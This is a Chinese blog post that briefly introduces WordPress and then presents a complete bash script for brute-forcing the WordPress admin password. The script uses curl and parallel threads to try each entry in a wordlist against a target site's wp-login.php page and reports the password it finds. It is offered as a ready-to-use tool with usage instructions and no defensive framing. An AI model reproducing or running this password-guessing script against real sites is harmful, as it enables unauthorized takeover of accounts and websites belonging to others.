WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL 数据库的服务器上架设自己的网志。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。WordPress 是一个免费的开源项目,在GNU通用公共许可证下授权发布。
目前最新版本为4.0版。 WordPress 被认为是Michel Valdrighi所开发的网志平台b2/cafelog的正式继承者。
“WordPress”这个名字出自 Christine Selleck 的主意,他是主要开发者Matt Mullenweg的朋友。
本次给大家带来WordPress后台密码暴力破解程序,请先确认机器已安装curl。
#!/bin/bash #by leo108 #使用方式:./wp-pwd.sh 用户名 字典 登录页面 线程数 #例如: ./wp-pwd.sh leo 1.txt http://xxx.com/wp-login.php 15 user=$1 zidian=$2 url=$3 thread=$4 function guess { curl -s -d "log=$user&pwd=$1" $url >> $1.html l=$(wc -l $1.html| awk -F[:" "]+ '{print $1}') if [ 0 -eq $l ]; then echo $1 >> pwd.txt rm $1.html return 1 else rm $1.html return 0 fi } if [ -e pwd.txt ]; then rm pwd.txt fi tmp_fifofile="/tmp/$$.fifo" mkfifo $tmp_fifofile exec 6<>$tmp_fifofile rm $tmp_fifofile for ((i=0;i<$thread;i++)); do echo done >&6 while read line;do if [ -e pwd.txt ]; then break fi read -u6 { echo "Testing "$line guess $line echo >&6 } & done < $zidian wait exec 6>&- if [ -e pwd.txt ]; then echo "Password is " cat pwd.txt rm pwd.txt else echo "Not Found" fi exit 0
留言评论(旧系统):